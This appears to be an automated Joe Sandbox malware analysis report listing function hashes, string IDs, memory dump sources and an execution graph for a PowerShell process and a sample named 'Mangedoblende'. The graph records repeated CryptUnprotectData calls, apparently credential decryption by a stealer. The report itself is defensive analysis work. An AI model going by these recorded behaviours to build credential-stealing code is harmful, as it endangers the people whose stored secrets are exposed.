                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: tPeq$$eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-2959799000
                                                                                                                                                                            • Opcode ID: 393b7370c05e1de7c52c45adffdf1fb5b11044505e4c42a79f39dabede1132dc
                                                                                                                                                                            • Instruction ID: 5608b6958eb720393d6db5eca82ffe84a5627f79a252125635312476628e523a
                                                                                                                                                                            • Opcode Fuzzy Hash: 393b7370c05e1de7c52c45adffdf1fb5b11044505e4c42a79f39dabede1132dc
                                                                                                                                                                            • Instruction Fuzzy Hash: D921D677A00615DFEFA49E79D540A7ABBB9AFC0712B14416FE8809B351CF31E940C761
                                                                                                                                                                            Function 07641598 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $eq$$eq$$eq$jl$jl
                                                                                                                                                                            • API String ID: 0-2188386785
                                                                                                                                                                            • Opcode ID: ff07534bfb97fdb0ad0fd0d878a6b29a5b67c95ce756cc28bc1e2c11986df944
                                                                                                                                                                            • Instruction ID: 261bb6e40d1fddadf491bfc114430ae2ec1a1a31ad240d9d2824ac299e24ab43
                                                                                                                                                                            • Opcode Fuzzy Hash: ff07534bfb97fdb0ad0fd0d878a6b29a5b67c95ce756cc28bc1e2c11986df944
                                                                                                                                                                            • Instruction Fuzzy Hash: 6811ECF571421EA7DB2C5A7ED410767BB96ABC3361F28802AE44BD7380DA71C4C1C751
                                                                                                                                                                            Function 07643948 Relevance: 5.2, Strings: 4, Instructions: 243COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$tPeq$tPeq
                                                                                                                                                                            • API String ID: 0-2569001085
                                                                                                                                                                            • Opcode ID: cdf8704278476eb37dfe073f251afeab2087e680806dff281da4140bcd6bd9f0
                                                                                                                                                                            • Instruction ID: 903994a774be920851ee27002bfc0e07d74c9c6f23a7459de8a58ad82ad73cb5
                                                                                                                                                                            • Opcode Fuzzy Hash: cdf8704278476eb37dfe073f251afeab2087e680806dff281da4140bcd6bd9f0
                                                                                                                                                                            • Instruction Fuzzy Hash: 8471FAF27142168FCB259E7A841176ABBA2AFD5310F18C07AD517EB781DB32CD82C791
                                                                                                                                                                            Function 076491D8 Relevance: 5.2, Strings: 4, Instructions: 241COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$Pi$Pi
                                                                                                                                                                            • API String ID: 0-2146945663
                                                                                                                                                                            • Opcode ID: aad46b5fc285be043098340001567340c1f7035d8542d363033b4540c4b0c4f9
                                                                                                                                                                            • Instruction ID: a1fd4150e952851b153e7bfb367e1dc995b7010d9e498ab1885a72b11158751d
                                                                                                                                                                            • Opcode Fuzzy Hash: aad46b5fc285be043098340001567340c1f7035d8542d363033b4540c4b0c4f9
                                                                                                                                                                            • Instruction Fuzzy Hash: FA916FF0B502059FCB14DF68C541AAEBBE2BF89314F15C069D506AB795CB32ED81CB91
                                                                                                                                                                            Function 07645F20 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 84rl$84rl$tPeq$tPeq
                                                                                                                                                                            • API String ID: 0-1535575575
                                                                                                                                                                            • Opcode ID: 27ecf7dbf530b21e2f9f2c2645de1657f952c1a20c6dd55dd669693d0d46f570
                                                                                                                                                                            • Instruction ID: 077c2631b7fde6cd57f940e7c3477dabb2fc455601e2e6bbaa18017273469ebe
                                                                                                                                                                            • Opcode Fuzzy Hash: 27ecf7dbf530b21e2f9f2c2645de1657f952c1a20c6dd55dd669693d0d46f570
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C514BB1B002159FCB159F79C944A7BBBE6AF85710F28C469D8079B382DB32DD41C791
                                                                                                                                                                            Function 076436A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-812946093
                                                                                                                                                                            • Opcode ID: bd1365a9315fdfa051a1a0fd4d4ae51ee58ce717a3006d4dadede823f733a1a8
                                                                                                                                                                            • Instruction ID: 523d4060bbdc04f02e51b64ca2be94e085eae8c075e7d9e1a7a5c7d1655bce8c
                                                                                                                                                                            • Opcode Fuzzy Hash: bd1365a9315fdfa051a1a0fd4d4ae51ee58ce717a3006d4dadede823f733a1a8
                                                                                                                                                                            • Instruction Fuzzy Hash: D22127F2320207ABDF64597B9841B27BBD6ABC2711F24842AE547EB381DD35C8418365
                                                                                                                                                                            Function 07640ACE Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: tPeq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-4171418179
                                                                                                                                                                            • Opcode ID: 08214dc03a8bdd25479d89875f5f810b21326fc8d504830fb3ddc9750279b96b
                                                                                                                                                                            • Instruction ID: 17b8253027b19e502a473ed69f1469059cd79d6a6fe083b1e8e1d8d30a2b514c
                                                                                                                                                                            • Opcode Fuzzy Hash: 08214dc03a8bdd25479d89875f5f810b21326fc8d504830fb3ddc9750279b96b
                                                                                                                                                                            • Instruction Fuzzy Hash: 232134B1205326DFC7618B758800BA6BFF1AF86228F2940DAEA458B363C632CC00C755
                                                                                                                                                                            Function 0764AAB6 Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-812946093
                                                                                                                                                                            • Opcode ID: 75e3a669eef9404a72929cdde5f162044c632905d1b0c5907c7febb5d53fdcdc
                                                                                                                                                                            • Instruction ID: 2cc4019ce2daaf816429d506e401759ecfae0dcf47a2ce2f64feb7bbfce7665d
                                                                                                                                                                            • Opcode Fuzzy Hash: 75e3a669eef9404a72929cdde5f162044c632905d1b0c5907c7febb5d53fdcdc
                                                                                                                                                                            • Instruction Fuzzy Hash: 1421C1F1A45347FFCB718EF5C5012B6BBB6AB46220F18C1AED40687382D631D481CB62
                                                                                                                                                                            Function 0764030A Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-3287427201
                                                                                                                                                                            • Opcode ID: 18525ba962be588017bfab2e2c7344594611970fef01495790d4887ac424a516
                                                                                                                                                                            • Instruction ID: 0bfb49372943c289b09124c7f58a68c448bdea374d010cb4c0ff6297992203d3
                                                                                                                                                                            • Opcode Fuzzy Hash: 18525ba962be588017bfab2e2c7344594611970fef01495790d4887ac424a516
                                                                                                                                                                            • Instruction Fuzzy Hash: 8601A26171E7E38FC727167858211AA7FB29FC361072940DBD182CF697CA254D4AC3A3

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:9%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:14.9%
                                                                                                                                                                            Total number of Nodes:329
                                                                                                                                                                            Total number of Limit Nodes:24
                                                                                                                                                                            execution_graph 70267 18e018 70268 18e024 70267->70268 70313 225b2962 70268->70313 70320 225b2970 70268->70320 70269 18e0c3 70327 225be258 70269->70327 70331 225be251 70269->70331 70270 18e0ed 70335 225beaf8 70270->70335 70339 225beb08 70270->70339 70271 18e0fb 70343 227a7b78 70271->70343 70352 227a7b69 70271->70352 70272 18e1d4 70361 22815fc7 70272->70361 70370 22815fd8 70272->70370 70273 18e2e5 70379 2281660f 70273->70379 70386 22816629 70273->70386 70393 22816568 70273->70393 70400 22816678 70273->70400 70274 18e2ec 70407 22841ce0 70274->70407 70414 22841cf0 70274->70414 70275 18e3f6 70421 228421a7 70275->70421 70428 228421b8 70275->70428 70276 18e3fd 70435 228481e8 70276->70435 70442 228481ea 70276->70442 70277 18e507 70449 22848470 70277->70449 70456 22848461 70277->70456 70278 18e50e 70463 2284fb23 70278->70463 70470 2284fb30 70278->70470 70279 18e618 70477 225bfc5b 70279->70477 70481 225bfc68 70279->70481 70280 18e61f 70485 228373d0 70280->70485 70492 228373e0 70280->70492 70281 18e730 70499 2283d410 70281->70499 70506 2283d401 70281->70506 70282 18e83a 70314 225b2992 70313->70314 70315 225b2a5e 70314->70315 70513 225b9328 70314->70513 70517 225b9548 70314->70517 70523 225b992c 70314->70523 70529 225b9318 70314->70529 70315->70269 70321 225b2992 70320->70321 70322 225b2a5e 70321->70322 70323 225b9318 2 API calls 70321->70323 70324 225b9328 LdrInitializeThunk 70321->70324 70325 225b9548 2 API calls 70321->70325 70326 225b992c 2 API calls 70321->70326 70322->70269 70323->70322 70324->70322 70325->70322 70326->70322 70328 225be27a 70327->70328 70329 225b9548 2 API calls 70328->70329 70330 225be344 70328->70330 70329->70330 70330->70270 70332 225be27a 70331->70332 70333 225b9548 2 API calls 70332->70333 70334 225be344 70332->70334 70333->70334 70334->70270 70336 225beb2a 70335->70336 70337 225b9548 2 API calls 70336->70337 70338 225bebf4 70336->70338 70337->70338 70338->70271 70340 225beb2a 70339->70340 70341 225b9548 2 API calls 70340->70341 70342 225bebf4 70340->70342 70341->70342 70342->70271 70344 227a7b9a 70343->70344 70345 227a8029 70344->70345 70347 225b9318 2 API calls 70344->70347 70348 225b9328 LdrInitializeThunk 70344->70348 70349 225b9548 2 API calls 70344->70349 70350 225b992c 2 API calls 70344->70350 70345->70272 70346 227a7cac 70346->70345 70535 227a8431 70346->70535 70347->70346 70348->70346 70349->70346 70350->70346 70353 227a7b70 70352->70353 70354 227a8029 70353->70354 70356 225b9318 2 API calls 70353->70356 70357 225b9328 LdrInitializeThunk 70353->70357 70358 225b9548 2 API calls 70353->70358 70359 225b992c 2 API calls 70353->70359 70354->70272 70355 227a7cac 70355->70354 70360 227a8431 CryptUnprotectData 70355->70360 70356->70355 70357->70355 70358->70355 70359->70355 70360->70355 70364 22815fcc 70361->70364 70362 228164c9 70362->70273 70363 22816114 70363->70362 70369 227a8431 CryptUnprotectData 70363->70369 70364->70362 70365 225b9318 2 API calls 70364->70365 70366 225b9328 LdrInitializeThunk 70364->70366 70367 225b9548 2 API calls 70364->70367 70368 225b992c 2 API calls 70364->70368 70365->70363 70366->70363 70367->70363 70368->70363 70369->70363 70371 22815ffa 70370->70371 70372 228164c9 70371->70372 70374 225b9318 2 API calls 70371->70374 70375 225b9328 LdrInitializeThunk 70371->70375 70376 225b9548 2 API calls 70371->70376 70377 225b992c 2 API calls 70371->70377 70372->70273 70373 22816114 70373->70372 70378 227a8431 CryptUnprotectData 70373->70378 70374->70373 70375->70373 70376->70373 70377->70373 70378->70373 70380 2281661a 70379->70380 70381 2281676d 70380->70381 70382 225b9318 2 API calls 70380->70382 70383 225b9328 LdrInitializeThunk 70380->70383 70384 225b9548 2 API calls 70380->70384 70385 225b992c 2 API calls 70380->70385 70381->70274 70382->70381 70383->70381 70384->70381 70385->70381 70387 2281664e 70386->70387 70388 2281676d 70387->70388 70389 225b9318 2 API calls 70387->70389 70390 225b9328 LdrInitializeThunk 70387->70390 70391 225b9548 2 API calls 70387->70391 70392 225b992c 2 API calls 70387->70392 70388->70274 70389->70388 70390->70388 70391->70388 70392->70388 70394 22816576 70393->70394 70395 22816602 70394->70395 70396 225b9318 2 API calls 70394->70396 70397 225b9328 LdrInitializeThunk 70394->70397 70398 225b9548 2 API calls 70394->70398 70399 225b992c 2 API calls 70394->70399 70395->70274 70396->70395 70397->70395 70398->70395 70399->70395 70401 2281667b 70400->70401 70402 2281676d 70401->70402 70403 225b9318 2 API calls 70401->70403 70404 225b9328 LdrInitializeThunk 70401->70404 70405 225b9548 2 API calls 70401->70405 70406 225b992c 2 API calls 70401->70406 70402->70274 70403->70402 70404->70402 70405->70402 70406->70402 70408 22841d12 70407->70408 70409 22841de5 70408->70409 70410 225b9318 2 API calls 70408->70410 70411 225b9328 LdrInitializeThunk 70408->70411 70412 225b9548 2 API calls 70408->70412 70413 225b992c 2 API calls 70408->70413 70409->70275 70410->70409 70411->70409 70412->70409 70413->70409 70415 22841d12 70414->70415 70416 22841de5 70415->70416 70417 225b9318 2 API calls 70415->70417 70418 225b9328 LdrInitializeThunk 70415->70418 70419 225b9548 2 API calls 70415->70419 70420 225b992c 2 API calls 70415->70420 70416->70275 70417->70416 70418->70416 70419->70416 70420->70416 70422 228421b8 70421->70422 70423 2284227f 70422->70423 70424 225b9318 2 API calls 70422->70424 70425 225b9328 LdrInitializeThunk 70422->70425 70426 225b9548 2 API calls 70422->70426 70427 225b992c 2 API calls 70422->70427 70423->70276 70424->70423 70425->70423 70426->70423 70427->70423 70429 228421d4 70428->70429 70430 2284227f 70429->70430 70431 225b9318 2 API calls 70429->70431 70432 225b9328 LdrInitializeThunk 70429->70432 70433 225b9548 2 API calls 70429->70433 70434 225b992c 2 API calls 70429->70434 70430->70276 70431->70430 70432->70430 70433->70430 70434->70430 70436 22848204 70435->70436 70437 228482af 70436->70437 70438 225b9318 2 API calls 70436->70438 70439 225b9328 LdrInitializeThunk 70436->70439 70440 225b9548 2 API calls 70436->70440 70441 225b992c 2 API calls 70436->70441 70437->70277 70438->70437 70439->70437 70440->70437 70441->70437 70443 22848204 70442->70443 70444 228482af 70443->70444 70445 225b9318 2 API calls 70443->70445 70446 225b9328 LdrInitializeThunk 70443->70446 70447 225b9548 2 API calls 70443->70447 70448 225b992c 2 API calls 70443->70448 70444->70277 70445->70444 70446->70444 70447->70444 70448->70444 70450 22848492 70449->70450 70451 22848542 70450->70451 70452 225b9318 2 API calls 70450->70452 70453 225b9328 LdrInitializeThunk 70450->70453 70454 225b9548 2 API calls 70450->70454 70455 225b992c 2 API calls 70450->70455 70451->70278 70452->70451 70453->70451 70454->70451 70455->70451 70457 22848470 70456->70457 70458 22848542 70457->70458 70459 225b9318 2 API calls 70457->70459 70460 225b9328 LdrInitializeThunk 70457->70460 70461 225b9548 2 API calls 70457->70461 70462 225b992c 2 API calls 70457->70462 70458->70278 70459->70458 70460->70458 70461->70458 70462->70458 70464 2284fb52 70463->70464 70465 2284fc02 70464->70465 70466 225b9318 2 API calls 70464->70466 70467 225b9328 LdrInitializeThunk 70464->70467 70468 225b9548 2 API calls 70464->70468 70469 225b992c 2 API calls 70464->70469 70465->70279 70466->70465 70467->70465 70468->70465 70469->70465 70471 2284fb52 70470->70471 70472 2284fc02 70471->70472 70473 225b9318 2 API calls 70471->70473 70474 225b9328 LdrInitializeThunk 70471->70474 70475 225b9548 2 API calls 70471->70475 70476 225b992c 2 API calls 70471->70476 70472->70279 70473->70472 70474->70472 70475->70472 70476->70472 70478 225bfc68 70477->70478 70479 225b9548 2 API calls 70478->70479 70480 225bfd3a 70478->70480 70479->70480 70480->70280 70482 225bfc8a 70481->70482 70483 225b9548 2 API calls 70482->70483 70484 225bfd3a 70482->70484 70483->70484 70484->70280 70487 228373cd 70485->70487 70486 228374a7 70486->70281 70487->70485 70487->70486 70488 225b9318 2 API calls 70487->70488 70489 225b9328 LdrInitializeThunk 70487->70489 70490 225b9548 2 API calls 70487->70490 70491 225b992c 2 API calls 70487->70491 70488->70486 70489->70486 70490->70486 70491->70486 70493 228373fc 70492->70493 70494 228374a7 70493->70494 70495 225b9318 2 API calls 70493->70495 70496 225b9328 LdrInitializeThunk 70493->70496 70497 225b9548 2 API calls 70493->70497 70498 225b992c 2 API calls 70493->70498 70494->70281 70495->70494 70496->70494 70497->70494 70498->70494 70500 2283d42c 70499->70500 70501 2283d4d7 70500->70501 70502 225b9318 2 API calls 70500->70502 70503 225b9328 LdrInitializeThunk 70500->70503 70504 225b9548 2 API calls 70500->70504 70505 225b992c 2 API calls 70500->70505 70501->70282 70502->70501 70503->70501 70504->70501 70505->70501 70507 2283d410 70506->70507 70508 2283d4d7 70507->70508 70509 225b9318 2 API calls 70507->70509 70510 225b9328 LdrInitializeThunk 70507->70510 70511 225b9548 2 API calls 70507->70511 70512 225b992c 2 API calls 70507->70512 70508->70282 70509->70508 70510->70508 70511->70508 70512->70508 70514 225b933a 70513->70514 70516 225b933f 70513->70516 70514->70315 70515 225b9a69 LdrInitializeThunk 70515->70514 70516->70514 70516->70515 70522 225b9579 70517->70522 70518 225b96d9 70518->70315 70519 225b9924 LdrInitializeThunk 70519->70518 70521 225b9328 LdrInitializeThunk 70521->70522 70522->70518 70522->70519 70522->70521 70524 225b97e3 70523->70524 70526 225b9924 LdrInitializeThunk 70524->70526 70528 225b9328 LdrInitializeThunk 70524->70528 70527 225b9a81 70526->70527 70527->70315 70528->70524 70530 225b933a 70529->70530 70534 225b933f 70529->70534 70530->70315 70531 225b9924 LdrInitializeThunk 70531->70530 70533 225b9328 LdrInitializeThunk 70533->70534 70534->70530 70534->70531 70534->70533 70536 227a8440 70535->70536 70540 227a8a59 70536->70540 70548 227a8a68 70536->70548 70537 227a84b0 70537->70346 70541 227a8a5c 70540->70541 70542 227a8b41 70541->70542 70546 227a8a68 CryptUnprotectData 70541->70546 70547 227a8a59 CryptUnprotectData 70541->70547 70556 227a8c4a 70541->70556 70560 227a87c0 70542->70560 70546->70542 70547->70542 70549 227a8b41 70548->70549 70550 227a8a8d 70548->70550 70551 227a87c0 CryptUnprotectData 70549->70551 70550->70549 70553 227a8c4a CryptUnprotectData 70550->70553 70554 227a8a68 CryptUnprotectData 70550->70554 70555 227a8a59 CryptUnprotectData 70550->70555 70552 227a8d0d 70551->70552 70552->70537 70553->70549 70554->70549 70555->70549 70557 227a8c5d 70556->70557 70558 227a87c0 CryptUnprotectData 70557->70558 70559 227a8d0d 70558->70559 70559->70542 70561 227a8ef8 CryptUnprotectData 70560->70561 70562 227a8d0d 70561->70562 70562->70537 70563 225b9c18 70564 225b9c1f 70563->70564 70566 225b9c25 70563->70566 70565 225b9328 LdrInitializeThunk 70564->70565 70564->70566 70568 225b9fa6 70564->70568 70565->70568 70567 225b9328 LdrInitializeThunk 70567->70568 70568->70566 70568->70567 70569 22936cf0 70570 22936d58 CreateWindowExW 70569->70570 70572 22936e14 70570->70572 70643 229cbfe8 70644 229cc02e GetCurrentProcess 70643->70644 70646 229cc079 70644->70646 70647 229cc080 GetCurrentThread 70644->70647 70646->70647 70648 229cc0bd GetCurrentProcess 70647->70648 70649 229cc0b6 70647->70649 70650 229cc0f3 70648->70650 70649->70648 70651 229cc11b GetCurrentThreadId 70650->70651 70652 229cc14c 70651->70652 70573 2293b5f8 70574 2293b900 70573->70574 70575 2293b620 70573->70575 70576 2293b629 70575->70576 70579 2293aac4 70575->70579 70578 2293b64c 70578->70578 70580 2293aacf 70579->70580 70581 2293b943 70580->70581 70583 2293aae0 70580->70583 70581->70578 70584 2293b978 OleInitialize 70583->70584 70585 2293b9dc 70584->70585 70585->70581 70586 229cc230 DuplicateHandle 70587 229cc2c6 70586->70587 70588 ad044 70590 ad05c 70588->70590 70589 ad0b6 70590->70589 70595 22936ea8 70590->70595 70599 22936e99 70590->70599 70603 229342cc 70590->70603 70611 22937bf8 70590->70611 70596 22936ece 70595->70596 70597 229342cc CallWindowProcW 70596->70597 70598 22936eef 70597->70598 70598->70589 70600 22936ece 70599->70600 70601 229342cc CallWindowProcW 70600->70601 70602 22936eef 70601->70602 70602->70589 70604 229342d7 70603->70604 70605 22937c69 70604->70605 70607 22937c59 70604->70607 70608 22937c67 70605->70608 70629 229343f4 70605->70629 70619 22937d81 70607->70619 70624 22937d90 70607->70624 70615 22937c35 70611->70615 70612 22937c69 70613 22937c67 70612->70613 70614 229343f4 CallWindowProcW 70612->70614 70614->70613 70615->70612 70616 22937c59 70615->70616 70617 22937d81 CallWindowProcW 70616->70617 70618 22937d90 CallWindowProcW 70616->70618 70617->70613 70618->70613 70621 22937d90 70619->70621 70620 22937e30 70620->70608 70633 22937e48 70621->70633 70636 22937e38 70621->70636 70626 22937da4 70624->70626 70625 22937e30 70625->70608 70627 22937e38 CallWindowProcW 70626->70627 70628 22937e48 CallWindowProcW 70626->70628 70627->70625 70628->70625 70630 229343ff 70629->70630 70631 229394ca CallWindowProcW 70630->70631 70632 22939479 70630->70632 70631->70632 70632->70608 70634 22937e59 70633->70634 70640 22939402 70633->70640 70634->70620 70637 22937e48 70636->70637 70638 22937e59 70637->70638 70639 22939402 CallWindowProcW 70637->70639 70638->70620 70639->70638 70641 229343f4 CallWindowProcW 70640->70641 70642 2293941a 70641->70642 70642->70634

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 0018C146 Relevance: 6.5, Strings: 5, Instructions: 230COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1409 18c146-18c158 1410 18c15a-18c168 1409->1410 1411 18c184 1409->1411 1414 18c16a 1410->1414 1412 18c186-18c18a 1411->1412 1415 18c16e-18c170 1414->1415 1416 18c172 1415->1416 1417 18c17b-18c17e 1416->1417 1418 18c174-18c179 1416->1418 1419 18c18b-18c199 1417->1419 1420 18c180-18c182 1417->1420 1418->1412 1419->1414 1422 18c19b-18c19d 1419->1422 1420->1410 1420->1411 1422->1415 1423 18c19f-18c1a1 1422->1423 1423->1416 1424 18c1a3-18c1c8 1423->1424 1425 18c1ca 1424->1425 1426 18c1cf-18c2ac call 1841a0 call 183cc0 1424->1426 1425->1426 1436 18c2ae 1426->1436 1437 18c2b3-18c2d4 call 185658 1426->1437 1436->1437 1439 18c2d9-18c2e4 1437->1439 1440 18c2eb-18c2ef 1439->1440 1441 18c2e6 1439->1441 1442 18c2f1-18c2f2 1440->1442 1443 18c2f4-18c2fb 1440->1443 1441->1440 1444 18c313-18c357 1442->1444 1445 18c2fd 1443->1445 1446 18c302-18c310 1443->1446 1450 18c3bd-18c3d4 1444->1450 1445->1446 1446->1444 1452 18c359-18c36f 1450->1452 1453 18c3d6-18c3fb 1450->1453 1457 18c399 1452->1457 1458 18c371-18c37d 1452->1458 1459 18c3fd-18c412 1453->1459 1460 18c413 1453->1460 1463 18c39f-18c3bc 1457->1463 1461 18c37f-18c385 1458->1461 1462 18c387-18c38d 1458->1462 1459->1460 1464 18c397 1461->1464 1462->1464 1463->1450 1464->1463
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: 70f98ae4a775a6f586f4ed09efbc9311621c1bce2b202305dbe95625f6bf8f2b
                                                                                                                                                                            • Instruction ID: 6a0217494450f35bc21c7fafe8eca1bb9068cf822fc3c1b43d7e801c3e828e1e
                                                                                                                                                                            • Opcode Fuzzy Hash: 70f98ae4a775a6f586f4ed09efbc9311621c1bce2b202305dbe95625f6bf8f2b
                                                                                                                                                                            • Instruction Fuzzy Hash: 0CA1C674E04618DFDB54DFA9C884A9DBBF2BF89310F15C06AE819AB361DB349941CF60
                                                                                                                                                                            Function 0018C470 Relevance: 6.4, Strings: 5, Instructions: 196COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1468 18c470-18c471 1469 18c442-18c45e 1468->1469 1470 18c473-18c498 1468->1470 1472 18c49a 1470->1472 1473 18c49f-18c57c call 1841a0 call 183cc0 1470->1473 1472->1473 1484 18c57e 1473->1484 1485 18c583-18c5a4 call 185658 1473->1485 1484->1485 1487 18c5a9-18c5b4 1485->1487 1488 18c5bb-18c5bf 1487->1488 1489 18c5b6 1487->1489 1490 18c5c1-18c5c2 1488->1490 1491 18c5c4-18c5cb 1488->1491 1489->1488 1492 18c5e3-18c627 1490->1492 1493 18c5cd 1491->1493 1494 18c5d2-18c5e0 1491->1494 1498 18c68d-18c6a4 1492->1498 1493->1494 1494->1492 1500 18c629-18c63f 1498->1500 1501 18c6a6-18c6cb 1498->1501 1505 18c669 1500->1505 1506 18c641-18c64d 1500->1506 1507 18c6cd-18c6e2 1501->1507 1508 18c6e3 1501->1508 1511 18c66f-18c68c 1505->1511 1509 18c64f-18c655 1506->1509 1510 18c657-18c65d 1506->1510 1507->1508 1512 18c667 1509->1512 1510->1512 1511->1498 1512->1511
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: e0e5d99eeea6eabd0f2b0f2e9cc39155b9b030da925a662d40d00a6d82c2c4f4
                                                                                                                                                                            • Instruction ID: da355c7c5db58fca4a7bd8db334ac5a5b4a14ab7a59e2d1a9d9eaed5751d7821
                                                                                                                                                                            • Opcode Fuzzy Hash: e0e5d99eeea6eabd0f2b0f2e9cc39155b9b030da925a662d40d00a6d82c2c4f4
                                                                                                                                                                            • Instruction Fuzzy Hash: C691A474E00218DFDB58DFAAD944A9DBBF2FF88300F259069E419AB365EB349941CF50
                                                                                                                                                                            Function 00185362 Relevance: 6.4, Strings: 5, Instructions: 195COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
